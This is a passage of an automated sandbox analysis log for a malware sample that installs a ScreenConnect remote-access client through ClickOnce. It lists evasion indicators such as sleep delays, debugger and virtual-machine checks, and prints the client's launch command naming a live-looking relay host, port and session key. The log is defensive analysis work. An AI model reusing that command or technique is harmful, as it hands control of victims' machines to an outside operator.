                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 8160 Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe TID: 1712 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe TID: 2324 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe TID: 1340 Thread sleep count: 376 > 30
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Last function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Last function: Thread delayed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Code function: 0_2_00624B9B FindFirstFileExA,0_2_00624B9B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Thread delayed: delay time: 40000
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\
                  Source: Amcache.hve.13.dr Binary or memory string: VMware
                  Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.3054816957.000001D2D987D000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3055864006.000001D2D9943000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3051108557.000001D2D750F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
                  Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
                  Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1874590511.000000001B169000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1My_
                  Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Code function: 0_2_00621920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00621920
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Code function: 0_2_00621000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00621000
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Code function: 0_2_006237C7 mov eax, dword ptr fs:[00000030h] 0_2_006237C7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Code function: 0_2_006269E3 GetProcessHeap,0_2_006269E3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Code function: 0_2_00621493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00621493
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00621920
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_006246C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006246C3
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621AAD SetUnhandledExceptionFilter,0_2_00621AAD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\dtabl3ol.hy1\do55etey.oe4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\screenconnect.clientservice.exe" "?e=support&y=guest&h=miledin.mwhelp.site&p=8880&k=bgiaaackaabsu0exaagaaaeaaqc1bc7fdvjjfmjkdeqwcij3jjneml4x59nf7ggtnmjpuazxqdcf4oxznuaf7%2bpvugux9iql0n%2fv66hq12w0ziemc6tfje3cmndeozodx53g06q8buhtzh2x%2f%2b%2bqrazh38rwy8beaezwgd3uplgjgt802v5ryoiginnpsg2qeyjy4zp%2b13derrkttsv6uqi5ikxqwvcrjc%2fgnpsbkuxd%2f8jpqy4dtsbrmb9x3urpot2zflzmjv0lf10mnynoj1gz6q1%2bfaqncjp2sqix%2flzxsofe0atfkdojc3uhmzdhfuwsymenjpldauviud8llhjxaaew8kihkbgfg7ine6vysqaj&r=&i=" "1"
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr Binary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
